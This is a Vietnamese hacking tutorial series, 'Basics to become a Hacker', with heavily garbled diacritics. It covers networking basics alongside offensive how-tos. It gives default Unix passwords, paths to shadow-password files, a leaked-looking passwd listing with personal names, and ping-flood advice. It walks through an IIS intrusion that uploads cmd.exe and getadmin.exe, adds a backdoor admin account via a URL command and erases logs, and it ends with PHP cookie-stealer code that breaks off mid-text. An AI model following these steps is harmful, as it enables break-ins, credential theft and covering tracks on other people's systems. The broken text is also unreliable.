HBCBDTHacker[1]

Trân tr ng cám ơn ngư i ã cung c p cho UDS cu n sách này. Nh ng hi u bi t cơ b n nh t 1 tr thành Hacker - Ph n Nhi u b n Newbie có h i tôi “ Hack là như th nào ? Làm sao hack ?” Nhưng các b n ã quên m t m t i u là các b n c n ph I có ki n th c m t cách t ng quát , hi u các thu t ng mà nh ng ngư i rành v m ng hay s d ng . Riêng tôi thì chưa th t gi i bao nhiêu nhưng qua nghiên c u tôi cũng ã t ng h p ư c m t s ki n th c cơ b n , mu n chia s cho t t c các b n , nh m cùng các b n h c h i . Tôi s không ch u trách nhi m n u các b n dùng nó qu y phá ngư i khác . Các b n có th copy ho c post trong các trang Web khác nhưng hãy i n tiên tác gi dư i bài , tôn tr ng bài vi t này cũng chính là tôn tr ng tôi và công s c c a tôi , ng th i cũng tôn tr ng chính b n thân các b n . Trong này tôi cũng có chèn thêm m t s cách hack , crack và ví d căn b n , các b n có th ng d ng th và nghiên c u c nó hi u thêm , r i khi b t g p m t t mà các b n không hi u thì hãy c bài này bi t , trong này tôi có s d ng m t s ý c a bài vi t mà tôi th y r t hay t trang Web c a HVA , và các trang Web khác mà tôi ã t ng ghé thăm . Xin c m ơn nh ng tác gi ã vi t nh ng bài y . Bây gi là v n chính . 1 . ) Ta c n nh ng gì b t u? Có th nhi u b n không ng ý v i tôi nhưng cách t t nh t th c t p là các b n hãy dùng H H Window 9X , r I n các cái khác m nh hơn ó là Linux ho c Unix , dư I ây là nh ng cái b n c n có : + M t cái OS ( có th là DOS , Window 9X , Linux , Unit ….) + M t cái trang Web t t ( HVA ch ng h n hi`hi` greenbiggrin.gif greenbiggrin.gif ) + M t b trình duy t m ng t t ( là Nescape , IE , nhưng t t nh t có l là Gozzila ) + M t công c chat t t ( mIRC ,Yahoo Mass …..) + Telnet ( ho c nh ng cái tương t như nmap …) + Cái quan tr ng nh t mà b t c ai mu n tr thành m t hacker là u ph I có m t chút ki n th c v l p trình ( C , C++ , Visual Basic , Pert …..) 2 . ) Th nào là m t a ch IP ? _ a ch IP ư c chia thành 4 s gi i h n t 0 - 255. M i s ư c lưu b i 1 byte - > !P có kicks thư c là 4byte, ư c chia thành các l p a ch . Có 3 l p là A, B, và C. N u l p A, ta s có th có 16 tri u i ch , l p B có 65536 a ch . Ví d : l p B v i 132.25,chúng ta có t t c các a ch t 132.25.0.0 n 132.25.255.255. Ph n l n các a ch l p A llà s h u c a các công ty hay c a t ch c. M t ISP thư ng s h u m t vài a ch l p B ho c C. Ví d : N u a ch IP c a b n là 132.25.23.24 thì b n có th xác nh ISP c a b n là ai. ( có IP là 132.25.x.) _ IP là t vi t t t c a Internet Protocol, trên Internet thì a ch IP c a m I ngư i là duy nh t và nó s I di n cho chính ngư I ó, a ch IP ư c s d ng b i các máy tính khác nhau nh n bi t các máy tính k t n i gi a chúng. ây là lí do t i sao b n l i b IRC c m, và là cách ngư i ta tìm ra IP c a b n. a ch IP có th d dàng phát hi n ra, ngư i ta có th l y ư c qua các cách sau : + b n lư t qua m t trang web, IP c a b n b ghi l i + trên IRC, b t kì ai cũng có th có IP c a b n + trên ICQ, m i ngư i có th bi t IP c a b n, th m chí b n ch n ``do not show ip`` ngư i ta v n l y ư c nó + n u b n k t n i v i m t ai ó, h có th gõ ``systat –n ``, và bi t ư c ai ang k t n i ên h + n u ai ó g i cho b n m t email v i m t o n mã java tóm IP, h cũng có th tóm ư c IP c a b n ( Tài li u c a HVA ) 3 . ) Làm th nào bi t ư c a ch IP c a mình ? Run ánh l nh “winipcfg” . _ Trong Window : vào Start _ Trong mIRC : k t n I n máy ch sau ó ánh l nh “/dns ” _ Thông qua m t s trang Web có hi n th IP . 4 . ) IP Spoofing là gì ? _ M t s IP có m c ích xác nh m t thi t b duy nh t trên th gi i. Vì v y trên m ng m t máy ch có th cho phép m t thi t b khác trao i d li u qua l i mà không c n ki m tra máy ch . Tuy nhiên có th thay i IP c a b n, nghĩa là b n có th g i m t thông tin gi nm t máy khác mà máy ó s tin r ng thông tin nh n ư c xu t phát t m t máy nào ó (t t nhiên là không ph i máy c a b n). B n có th vư t qua máy ch mà không c n ph i có quy n i u khi n máy ch ó. i u tr ng i là ch nh ng thông tin ph n h i t máy ch s ư c g i n thi t b có IP mà chúng ta ã gi m o. Vì v y có th b n s không có ư c s ph n h i nh ng thông tin mà mình mong mu n. Có l i u duy nh t mà spoof IP có hi u qu là khi b n c n vư t qua firewall, tr m account và c n d u thông tin cá nhân! ( Tài li u c a HVA ) 5 . ) Trojan / worm / virus / logicbomb là cái gì ? _ Trojan : Nói cho d hi u thì ây là chương trình i p viên ư c cài vào máy c a ngư I khác ăn c p nhũng tài li u trên máy ó g I v cho ch nhân c a nó , Cái mà nó ăn c p có th là m t kh u , accourt , hay cookie ………. tuỳ theo ý mu n c a ngư I cài nó . _ virus : Nói cho d hi u thì ây là chương trình v I nh ng mã c bi t ư c cài ( ho c lây lan t máy khác ) lên máy c a n n nhân và th c hi n nh ng yêu c u c a mã ó , a s virut ư c s d ng phá ho I d li u ho c phá ho I máy tính . _ worm : ây là chương trình c l p có th t nhân b n b n thân nó và lây lan kh p bên trong m ng .Cũng gi ng như Virut , nó cũng có th phá ho I d li u , ho c nó có th phá ho I bên trong m ng , nhi u khi còn làm down c mang ó . _ logicbomb : Là chương trình g i m t lúc nhi u gói d li u cho cùng m t a ch , làm ng p l t h th ng , t t ngh n ư ng truy n ( trên server ) ho c dùng làm công c “kh ng b ” I phương ( bom Mail ) ;) . 6 . ) PGP là gì ? _ PGP là vi t t t c a t “Pretty Good Privacy” , ây là công c s d ng s mã hoá chìa khoá công c ng b o v nh ng h sơ Email và d li u , là d ng mã hoá an toàn cao s d ng ph n m m cho MS_DOS , Unix , VAX/VMS và cho nh ng d ng khác . 7 . ) Proxy là gì ? _Proxy cung c p cho ngư i s d ng truy xu t internet v i nh ng host ơn. Nh ng proxy server ph c v nh ng nghi th c t bi t ho c m t t p nh ng nghi th c th c thi trên dual_homed host ho c basion host. Nh ng chương trình client c a ngư i s dung s qua trung gian proxy server thay th cho server th t s mà ngư i s d ng c n giao ti p. Proxy server xác nh nh ng yêu c u t client và quy t nh áp ng hay không áp ng, n u yêu c u ư c áp ng, proxy server s k t n i v i server th t thay cho client và ti p t c chuy n ti p n nh ng yêu c u t client n server, cũng như áp ng nh ng yêu c u c a server n client. Vì v y proxy server gi ng c u n i trung gian gi a server và client . _ Proxy cho user truy xu t d ch v trên internet theo nghĩa tr c ti p. V i dual host homed c n ph i login vào host trư c khi s d ng d ch v nào trên internet. i u này thư ng không ti n l i, và m t s ngư i tr nên th t v ng khi h có c m giác thông qua firewall, v i proxy nó gi i quy t ư c v n này. T t nhiên nó còn có nh ng giao th c m i nhưng nói chung nó cũng khá ti n l i cho user. B i vì proxy cho phép user truy xu t nh ng d ch v trên internet t h th ng cá nhân c a h , vì v y nó không cho phép packet i tr c ti p gi a h th ng s d ng và internet. ư ng i là giáng ti p thông qua dual homed host ho c thông qua s k t h p gi a bastion host và screening rounter. ( Bài vi t c a Z3RON3 – tài li u c a HVA ) 8 . ) Unix là gì ? _ Unix là m t h i u hành ( gi ng Window ) .Nó hi n là h i u hành m nh nh t , và thân thi t v i các Hacker nh t . N u b n ã tr thành m t hacker th t s thì H H này không th thi u i v I b n . Nó ư c s d ng h tr cho l p trình ngôn ng C . 9 . ) Telnet là gì ? _ Telnet là m t chương trình cho phép ta k t n I n máy khác thông qua c ng ( port ) . M I máy tính ho c máy ch ( server ) u có c ng , sau ây là m t s c ng thông d ng : + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ Ví d : b n có th g I Telnet k t n I n mail.virgin.net trên port 25 . 10 . ) Làm th nào bi t mình ã Telnet n h th ng Unix ? _ Ok , tôi s nói cho b n bi t làm sao m t h th ng Unix có th chào h I b n khi b n k t n i t i nó . u tiên , khi b n g i Unix , thông thư ng nó s xu t hi n m t d u nh c : “ Log in : ” , ( tuy nhiên , ch v i như v y thì cũng chưa ch c ch n ây là Unix ư c ngo I tr chúng xu t hi n thông báo trư c ch “ log in :” như ví d : Welcome to SHUnix. Please log in ….) Bây gi ta ang t I d u nh c “log in” , b n c n ph I nh p vào m t account h p l . M t account thông thư ng g m có 8 c tính ho c hơn , sau khi b n nh p account vào , b n s th y có m t m t kh u , b n hãy th nh p Default Password th theo b ng sau : Account-------------------------Default Password Root----------------------------------------------- Root Sys------------------------------------------------ Sys / System / Bin Bin------------------------------------------------ -Sys / Bin Mountfsy------------------------------------------M ountfsys Nuuc----------------------------------------------- Anon Anon----------------------------------------------- Anon User----------------------------------------------- -User Games---------------------------------------------G ames Install-------------------------------------------- --Install Demo----------------------------------------------- Demo Guest---------------------------------------------- Guest 11 . ) shell account là cái gì ? _ M t shell account cho phép b n s d ng máy tính nhà b n như thi t b u cu I ( terminal ) mà v I nó b n có th ánh l nh n m t máy tính ang ch y Unix , “Shell” là chương trình có nhi m v d ch nh ng ký t c a b n g i n r I ưa vào th c hi n l nh c a chương trình Unix . V I m t shell account chính xác b n có th s d ng ư c m t tr m làm vi c m nh hơn nhi u so v I cái mà b n có th tư ng tư ng n ư c . B n có th l y ư c “shell account” mi n phí t I trang Web http://www.freeshell.com/ tuy nhiên b n s không s d ng ư c “telnet” cho n khi b n tr ti n cho nó . 12 . ) Làm cách nào b n có th crack Unix account passwords ? ây “l c h u” r I , các b n có th _ R t ơn gi n , tuy nhiên cách mà tôi nói v I các b n crack ư c chúng n u các b n may m n , còn không thì các b n c tham kh o . _ u tiên b n hãy ăng nh p vào h th ng có s d ng Unix như m t khách hàng ho c m t ngư I khách ghé thăm , n u may m n b n s l y ư c m t kh u ư c c t d u trong nh ng h th ng chu n như : /etc/passwd m i hàng trong m t h sơ passwd có m t tài kho n khác nhau , nó gi ng như hàng này : userid:password:userid#:groupid#:GECOS field:home dir:shell trong ó : + userid = the user id name : tên ăng nh p : có th là m t tên ho c m t s . + password : m t mã . Dùng làm gì h n các b n cũng bi t r I . + userid# : là m t s duy nh t ơc thông báo cho ngư I ăng ký khi h ăng ký m I l n u tiên . + groupid# : tương t như userid# , nhưng nó ư c dùng cho nh ng ngư I ang trong nhóm nào ó ( như nhóm Hunter Buq c a HVA ch ng h n ) + GECOS FIELD : ây là nơi ch a thông tin cho ngư I s d ng , trong ó có h tên y , s i n tho i , a ch v.v…. . ây cũng là ngu n t t ta d dàng crack m t m t kh u . + home dir : là thư m c ghi l I ho t ng c a ngư i khách khi h ghé thăm ( gi ng như m c History trong IE v y ) + Shell : ây là tên c a shell mà nó t ng b t u khi ta login . _ Hãy l y file password , l y file text ã mã hoá v , sau ó b n dùng chương trình ``CrackerJack`` ho c ``John the Ripper`` crack . _ Các b n th y cũng khá d ph I không ? Sai bét , không d dàng và may m n b n có th crack ư c vì h u h t bây gi h c t r t k , hãy c ti p b n s th y khó khăn ch nào . 13 . ) shadowed password là cái gì ? _ M t shadowed password ư c bi t n là trong file Unix passwd , khi b n nh p m t m t kh u , thì ngư I khác ch th y ư c trình ơn c a nó ( như ký hi u “ X ” ho c “ * ” ) . Cái này thông báo cho b n bi t là file passwd ã ư c c t gi nơi khác , nơi mà m t ngư I s d ng bình thư ng không th n ư c . Không l ta ành bó tay , dĩ nhiên là I v I m t hacker thì không rùi , ta không n ư c tr c ti p file shadowed password thì ta hãy tìm file sao lưu c a nó , ó là file Unshadowed . Nh ng file này trên h th ng c a Unix không c nh , b n hãy th v I l n lư t nh ng ư ng d n sau : CODE AIX 3 /etc/security/passwd ! or /tcb/auth/files/ / A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/ / SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow maps/tables/whatever > System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Trư c d u “ / ” u tiên c a m t hàng là tên c a h th ng tương ng , hãy căn c vào h thông th t s b n mu n l y r I l n theo ư ng d n phía sau d u “/” u tiên . Và cu I cùng là nh ng account passwd mà tôi t ng crack ư c , có th bây gi nó ã h t hi u l c r I : CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh b o m s bí m t nên pass c a h tôi xoá i và hãy tìm hi u thông tin có ư c t chúng xem H t ph n 1 vào ó là ký hi u “ x ” , các b n Tác gi : Anhdenday - HVAonline Nh ng hi u bi t cơ b n nh t 2 [10/11/2004 3:11:00 PM] tr thành Hacker - Ph n Vitual port ( c ng o ) là 1 s t nhiên c gói trong TCP(Tranmission Control Protocol) và UDP(User Diagram Protocol) header. Như m i nguòi ã bi t, Windows có th ch y nhi u chương trình 1 lúc, m i chương trình này có 1 c ng riêng dùng truy n và nh n d li u. Ví d 1 máy có a ch IP là 127.0.0.1 ch y WebServer, FTP_Server, POP3 server, etc, nh ng d ch v này u u c ch y trên 1 IP address là 127.0.0.1, khi m t gói tin u c g i n làm th nào máy tính c a chúng ta phân bi t ư c gói tin này i vào d ch v nào WebServer hay FTP server hay SM! TP? Chính vì th Port xu t hi n. M i d ch v có 1 s port m c nh, ví d FTP có port m c POP3 là 110, SMTP là 25 vân vân.... nh là 21, web service có port m c nh là 80, Ngư i qu n tr m ng có th thay i s port m c nh này, n u b n ko bi t s port trên m t máy ch , b n ko th k t n i vào d ch v ó ư c. Ch c b n ã t ng nghe nói n PORT MAPPING nhưng có l chưa bi t nó là gì và ch c năng th nào. Port mapping th c ra ơn gi n ch là quá trình chuy n i s port m c nh c a m t d ch v nào ó n 1 s khác. Ví d Port m c nh c a WebServer là 80, nhưng th nh tho ng có l b n v n ây chính là s port c a host xxx nhưng ã u c th y http://www.xxx.com:8080/ , 8080 nguòi qu n tr c a host này ``map`` t 80 thành 8080. ( Tài li u c a HVA ) 15 . ) DNS là gì ? _ DNS là vi t t t c a Domain Name System. M t máy ch DNS i k t n i c ng s 53, có nghĩa là n u b n mu n k t n i vào máy ch ó, b n ph i k t n i n c ng s 53. Máy ch ch y DNS chuy n hostname b ng các ch cái thành các ch s tương ng và ngư c l i. Ví d : 127.0.0.1 -- > localhost và localhost--- > 127.0.0.1 . ( Tài li u c a HVA ) 16 . ) ôi i u v Wingate : _ WinGate là m t chương trình ơn gi n cho phép b n chia các k t n i ra. Thí d : b n có th chia s 1 modem v i 2 ho c nhi u máy . WinGate dùng v i nhi u proxy khác nhau có th che gi u b n . _ Làm sao Wingate có th che d u b n ? Hãy làm theo tôi : B n hãy telnet trên c ng 23 trên máy ch ch y WinGate telnet proxy và b n s có d u nh c WinGate > . T i d u nh c này b n ánh vào tên server, cùng m t kho ng tr ng và c ng b n mu n k t n i vào. VD : CODE telnet wingate.net WinGate > victim.com 23 ta telnet n c ng 23 vì ây là c ng m c nh khi b n cài Wingate . lúc này IP trên máy mà victim ch p ư c c a ta là IP c a máy ch ch a Wingate proxy ó . _ Làm sao tìm Wingate ? + N u b n mu n tìm IP WinGates tĩnh (IP không i) thì n yahoo hay m t trang tìm ki m cable modem. Tìm ki m cable modems vì nhi u ngư i dùng cable modems có WinGate h có th chia s ư ng truy n r ng c a nó cable modems cho nh ng máy khác trong cùng m t nhà . Ho c b n có th dùng Port hay Domain scanners và scan Port 1080 . + tìm IP ng (IP thay i m i l n user k t n i vào internet) c a WinGates b n có th dùng Domscan ho c các chương trình quét khác . N u dùng Domscan b n hãy nh p kho ng IP b t kỳ vào box u tiên và s 23 vào box th 2 . Khi ã có k t qu , b n hãy th l n lư t telnet n các a ch IP tìm ơc ( ã hư ng d n trên ), n u nó xu t hi n d u “Wingate > ” thì b n ã tìm úng máy ang s d ng Wingate r I ó . + Theo kinh nghi m c a tôi thì b n hãy down wingatescanner v mà sài , nó có r t nhièu trên m ng . 17 . ) ôi i u v Traceroute : _ Traceroute là m t chương trình cho phép b n xác nh ư c ư ng i c a các gói packets t máy b n n h th ng ích trên m ng Internet. _ b n hãy xem VD sau : CODE C:\windows > tracert 203.94.12.54 Tracing route to 203.94.12.54 over a maximum of 30 hops 1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms 2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms 3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms 4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms 5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms 6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms 7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms 8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms 9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms 10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms 11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms 12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms 13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms Tôi c n bi t ư ng i t máy tôi n m t host trên m ng Internet có a ch ip là 203.94.12.54. Tôi c n ph i tracert n nó! Như b n th y trên, các gói packets t máy tôi mu n n ư c 203.94.12.54 ph i i qua 13 hops(m c xích) trên m ng. ây là ưòng i c a các gói packets . _ B n hãy xem VD ti p theo : CODE host2 # traceroute xyz.com traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets 1 isp.net (202.xy.34.12) 20ms 10ms 10ms 2 xyz.com (202.xx.12.34) 130ms 130ms 130ms + Dòng u tiên cho bi t hostname và a ch IP c a h th ng ích. Dòng này còn cho chúng ta bi t thêm giá tr TTL<=30 và kích thư c c a datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data). + Dòng th 2 cho bi t router u tiên nh n ư c datagram là 202.xy.34.12, giá tr c a TTL khi g i n router này là 1. Router này s g i tr l i cho chương trình traceroute m t ICMP message error ``Time Exceeded``. Traceroute s g i ti p m t datagram n h th ng ích. + Dòng th 3, xyz.com(202.xx.12.34) nh n ư c datagram có TTL=1(router th nh t ã gi m m t trư c ó - TTL=2-1=1). Tuy nhiên, xyz.com không ph i là m t router, nó s g i tr l i cho traceroute m t ICMP error message ``Port Unreachable``. Khi nh n ư c ICMP message này, traceroute s bi t ư c ã n ư c h th ng ích xyz.com và k t thúc nhi m v t i ây. + Trong trư ng h p router không tr l i sau 5 giây, traceroute s in ra m t d u sao ``*``(không bi t) và ti p t c g i datagram khác n host ích! _Chú ý: Trong windows: tracert hostname Trong unix: traceroute hostname ( Tài li u c a viethacker.net ) 18 . ) Ping và cách s d ng : _ Ping là 1 khái ni m rât ơn gi n tuy nhiên r t h u ích cho vi c ch n oán m ng. Ti u s c a t ``ping`` như sau: Ping là ti ng ng vang ra khi 1 tàu ng m mu n bi t có 1 v t th khác g n mình hay ko, n u có 1 v t th nào ó g n tàu ng m ti ng sóng âm này s va vào v t th ó và ti ng vang l i s là ``pong`` v y thì tàu ng m ó s bi t là có gì g n mình. _Trên Internet, khái ni m Ping cũng r t gi ng v i ti u s c a nó như ã c p trên. L nh Ping g i m t gói ICMP (Internet Control Message Protocol) n host, n u host ó ``pong`` l i có nghĩa là host ó t n t i (ho c là có th v i t i oc). Ping cũng có th giúp chúng ta biêt ư c lu ng th i gian m t gói tin (data packet) i t máy tính c a mình n 1 host nào ó. _Ping th t d dàng, ch c n m MS-DOS, và gõ ``ping a_ch _ip``, m c nh s ping 4 l n, nhưng b n cũng có th gõ CODE ``ping ip.address -t`` Cách này s làm máy ping mãi. CODE ``ping -l (size) thay i kích thư c ping làm như sau: a_ch _ip `` Cái ping làm là g i m t gói tin n m t máy tính, sau ó xem xem m t bao lâu gói tin r i xem xem sau bao lâu gói tin ó quay tr l i, cách này xác nh ư c t c c a k t n i, và th i gian c n m t gói tin i và quay tr l i và chia b n (g i là ``trip time``). Ping cũng có th ư c dùng làm ch m i ho c v h th ng b ng l t ping. Windows 98 treo sau m t phút l t ping (B m c a k t n i b tràn – có qua nhi u k t n i, nên Windows quy t nh cho nó i ngh m t chút). M t cu c t n công “ping flood” s chi m r t nhi u băng thông c a b n, và b n ph i có băng thông l n hơn i phương ( tr khi i phương là m t máy ch y Windows 98 và b n có m t modem trung bình, b ng cách ó b n s h g c i phương sau x p x m t phút l t ping). L t Ping không hi u qu l m i v i nh ng i phương m nh hơn m t chút. tr khi b n có nhi u ư ng và b n ki m soát m t s lư ng tương i các máy ch cùng ping mà t ng băng thông lơn hơn i phương. Chú ý: option –t c a DOS không gây ra l t ping, nó ch ping m c tiêu m t cách liên t c, v i nh ng kho ng ng t quãng gi a hai l n ping liên ti p. Trong t t c các h Unix ho c Linux, b n có th dùng ping -f gây ra l t th c s . Th c t là ph i ping -f n u b n dùng m t b n tương thích POSIX (POSIX - Portable Operating System Interface d a trên uniX), n u không nó s không ph i là m t b n Unix/Linux th c s , b i v y n u b n dùng m t h i u hành mà nó t cho nó là Unix hay Linux, nó s có tham s -f. ( Tài li u c a HVA và viethacker.net ) 19 . ) K thu t xâm nh p Window NT t m ng Internet : _ ây là bài h c hack u tiên mà tôi th c hành khi b t u nghiên c u v hack , bây gi tôi s bày l i cho các b n . b n s c n ph I có m t s th I gian th c hi n ư c nó vì nó tuy d nhưng khó . Ta s b t u : _ u tiên b n c n tìm m t server ch y IIS : _ Ti p n b n vào DOS và ánh ` FTP `. VD : c:\Ftp http://www.dodgyinc.com/ ( trang naỳ khi tôi th c hành thì v n còn làm ư c , bây gi không bi t h ã fix chưa , n u b n nào có trang nào khác thì hãy post lên cho m I ngư I cùng làm nhé ) N u connect thành công , b n s th y m t s dòng tương t như th này : CODE Connected to http://www.dodgyinc.com./ 220 Vdodgy Microsoft FTP Service (Version 3.0). User (www.dodgyinc.com:(none)): Cái mà ta th y trên có ch a nh ng thông tin r t quan tr ng , nó cho ta bi t tên Netbios c a máy tính là “ Vdodgy ” . T i u này b n có th suy di n ra tên mà ư c s d ng cho NT cho phép ta có th khai thác , m c nh mà d ch v FTP gán cho nó n u nó chưa i tên s là “IUSR_VDODGY” . Hãy nh l y vì nó s có ích cho ta . Nh p ``anonymous” trong user nó s xu t hi n dòng sau : CODE 331 Anonymous access allowed, send identity (e-mail name) as password. Password: Bây gi passwd s là b t c gì mà ta chưa bi t , tuy nhiên , b n hãy th ánh vào passwd là “anonymous” . N u nó sai , b n hãy log in l I thi t b FTP , b n hãy nh là khi ta quay l I l n này thì không s d ng cách m o danh n a ( anonymous ) mà s d ng “`Guest” , th l i passwd v i “guest” xem th nào . Bây gi b n hãy ánh l nh trong DOS : CODE Cd /c Và s nhìn th y k t qu n u như b n ã xâm nh p thành công , bây gi b n hãy nhanh chóng tìm thư m c `cgi-bin` . N u như b n may m n , b n s tìm ư c d dàng vì thông thư ng h th ng qu n lý ã t `cgi-bin` vào nơi mà ta v a xâm nh p cho các ngư I qu n lý h d dàng i u khi n m ng hơn . thư m c cgi-bin có th ch a các chương trình mà b n có th l i d ng nó ch y t trình duy t Web c a b n . Ta hãy b t u “qu y” nào greenbiggrin.gif greenbiggrin.gif . _ u tiên , b n hãy chuy n t thư m c cgi-bin và s d ng l nh “Binary” ( có th các b n không c n dùng l nh này ) , sau ó b n dánh ti p l nh “put cmd.exe” . Ti p theo là b n c n có file hack cài vào thư m c này , hãy tìm trên m ng l y 2 file quan tr ng nh t ó là `getadmin.exe` và `gasys.dll` . Download chúng xu ng , m t khi b n ã có nó hãy cài vào trong thư m c cgi-bin . Ok , coi như m I vi c ã xong , b n hãy óng c a s DOS . Bây gi b n hãy ánh a ch sau lên trình duy t c a b n : http://www.dodgyinc.com/cgi-bin/getadmin.exe? IUSR_VDODGY Sau vài giây b n s có ư c câu tr l i như dư I ây : CODE CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Congratulations , now account IUSR_VDODGY have administrator rights! Th là b n ã m o danh admin xâm nh p h th ng , vi c c n thi t bây gi là b n hãy t t o cho mình m t account , hãy ánh dòng sau trên IE : http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add dòng l nh trên s t o cho b n m t account login v i user : anhdenday và passwd : toilahackerBây gi b n hãy là cho user này có account c a admin , b n ch c n ánh lên IE l nh : http://www.dodgyinc.com/cgi-bin/getadmin.exe? anhdenday V y là xong rùi ó , b n hãy disconnect và n start menu - > find r i search computer `www.dodgyinc.com`. Khi tìm th y , b n vào explore , explore NT s m ra b n hay nh p user và passwd m nó ( c a tôi là user : anhdenday và passwd : toilahacker ) . Có m t v n là khi b n xâm nh p h th ng này thì s b ghi l i , do ó xoá d u v t b n hãy vào `Winnt\system32\logfiles` m file log ó r I xoá nh ng thông tin liên quan n b n , r I save chúng . N u b n mu n l y m t thông báo gì v vi c chia s s xâm nh p thì b n hãy thay i ngày tháng trên máy tính v I URL sau : http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20 date%2030/04/03 xong r I b n hãy xoá file `getadmin.exe`, và `gasys.dll` t `cgi-bin` . M c ích khi ta xâm nh p h th ng này là “chôm” pass c a admin l n sau xâm nh p m t cách h p l , do ó b n hãy tìm file SAM ( ch a pass c a admin và member ) trong h th ng r I dùng chương trình “l0pht crack” crack pass ( Hư ng d n v cách s d ng “l0pht crack v 3.02” tôi ã post lên r i ,các b n hãy t nghiên c u nhé ) . ây là link : http://vnhacker.org/forum/?act=ST&f=6&t=11566 &s= Khi crack xong các b n ã có user và pass c a admin r I , bây gi hãy xoá account c a user ( c a tôi là “anhdenday” ) i cho an toàn . B n ã có th làm gì trong h th ng là tuỳ thích , nhưng các b n ng xoá h t tài li u c a h nhé , t i cho h l m . B n c m th y th nào , r c r i l m ph i không . Lúc tôi th hack cách này , tôi ã mày mò m t c 4 gi , n u như b n ã quen thì l n th 2 b n s m t ít th I gian hơn . ph n 3 tôi s , và làm th nào H t ph n 2 c p n H H Linux , n cách ng t m t kh u b o v c a m t Web site hack m t trang web ơn gi n nh t .v.v… Tác gi : Anhdenday - HVAOnline.net Nh ng hi u bi t cơ b n nh t 3 [12/7/2004 10:33:00 AM] tr thành Hacker - Ph n 20.) Cookie là gì ? Cookie là nh ng ph n d li u nh có c u trúc ư c chia s gi a web site và browser c a ngư i dùng. cookies ư c lưu tr dư i nh ng file d li u nh d ng text (size dư i 4k). Chúng ư c các site t o ra lưu tr /truy tìm/nh n bi t các thông tin v ngư i dùng ã ghé thăm site và nh ng vùng mà h i qua trong site. Nh ng thông tin này có th bao g m tên/ nh danh ngư i dùng, m t kh u, s thích, thói quen...Cookie ư c browser c a ngư i dùng ch p nh n lưu trên ĩa c ng c a máy mình, ko ph i browser nào cũng h tr cookie. Sau m t l n truy c p vào site, nh ng thông tin v ngư i dùng ư c lưu tr trong cookie. nh ng l n truy c p sau n site ó, web site có th dùng l i nh ng thông tin trong cookie (như thông tin liên quan n vi c ăng nh p vào 1 forum...) mà ngư i ko ph i làm l i thao tác ăng nh p hay ph i nh p l i các thông tin khác. V n t ra là có nhi u site qu n lý vi c dùng l i các thông tin lưu trong cookie ko chính xác, ki m tra ko y ho c mã hoá các thông tin trong cookie còn sơ h giúp cho hacker khai thác vư t qua cánh c a ăng nh p, o t quy n iêu khi n site . _ Cookies thư ng có các thành ph n sau : + Tên: do ngư i l p trình web site ch n + Domain: là tên mi n t server mà cookie ư c t o và g i i + ư ng d n: thông tin v ư ng d n web site mà b n ang xem + Ngày h t h n: là th i i m mà cookie h t hi u l c . + B o m t: N u giá tr này ơc thi t l p bên trong cookie, thông tin s ơc mã hoá trong quá trình truy n gi a server và browser. + Các giá tr khác: là nh ng d li u c trưng ư c web server lưu tr nh n d ng v sau các giá tr này ko ch a các kho ng tr ng, d u ch m, ph y và b gi i h n trong kho ng 4k. ( Tài li u c a Viethacker.net ) 21 . ) K thu t l y c p cookie c a n n nhân : _ Trư c h t , các b n hãy m notepad r i chép o n mã sau vào notepad ó : CODE 0) { if (strlen($title) > 0) { print(``[--------$title--------]`` . HTML_LINE); $res .= ``[--------$title--------]`` . LINE; } foreach ($arr as $key = > $value) { print(``[$key]`` . HTML_LINE); print($arr[$key] . HTML_LINE); $res .= ``[$key]`` . LINE . $arr[$key] . LINE; } } return $res; } // get current date $now = date(``Y-m-d H:i:s``); // init $myData = ``[-----$now-----]`` . LINE; // get $myData .= getvars($HTTP_GET_VARS, ````); // file $file = $REMOTE_ADDR . ``.txt``; $mode = ``r+``; if (!file_exists($file)) $mode = ``w+``; $fp = fopen ($file, $mode); fseek($fp, 0, SEEK_END); fwrite($fp, $myData); fclose($fp); ?> ho c CODE